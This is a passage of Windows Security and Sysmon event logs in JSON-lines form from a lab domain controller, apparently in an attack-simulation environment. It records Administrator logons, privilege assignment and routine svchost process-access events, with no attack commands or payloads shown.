Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{5F77CC13-BD98-A231-0CE6-3FD8C44D6CE1}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220336,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{5F77CC13-BD98-A231-0CE6-3FD8C44D6CE1}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{5F77CC13-BD98-A231-0CE6-3FD8C44D6CE1}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220337,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46337\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{5F77CC13-BD98-A231-0CE6-3FD8C44D6CE1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x46337","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{5F77CC13-BD98-A231-0CE6-3FD8C44D6CE1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220338,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46337\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x46337","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2478,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2104\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00105E4A0000}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+4689|c:\\windows\\system32\\themeservice.dll+3fdd|c:\\windows\\system32\\themeservice.dll+3c53|c:\\windows\\system32\\themeservice.dll+2675|c:\\windows\\system32\\themeservice.dll+1ed0|c:\\windows\\system32\\themeservice.dll+2006|C:\\Windows\\SYSTEM32\\ntdll.dll+45079|C:\\Windows\\SYSTEM32\\ntdll.dll+29bfa|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"2104","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00105E4A0000}","TargetProcessId":"804","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+4689|c:\\windows\\system32\\themeservice.dll+3fdd|c:\\windows\\system32\\themeservice.dll+3c53|c:\\windows\\system32\\themeservice.dll+2675|c:\\windows\\system32\\themeservice.dll+1ed0|c:\\windows\\system32\\themeservice.dll+2006|C:\\Windows\\SYSTEM32\\ntdll.dll+45079|C:\\Windows\\SYSTEM32\\ntdll.dll+29bfa|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2479,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2480,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001014B90000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001014B90000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2481,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00105E4A0000}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00105E4A0000}","TargetProcessId":"804","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2482,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00105E4A0000}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00105E4A0000}","TargetProcessId":"804","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2483,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+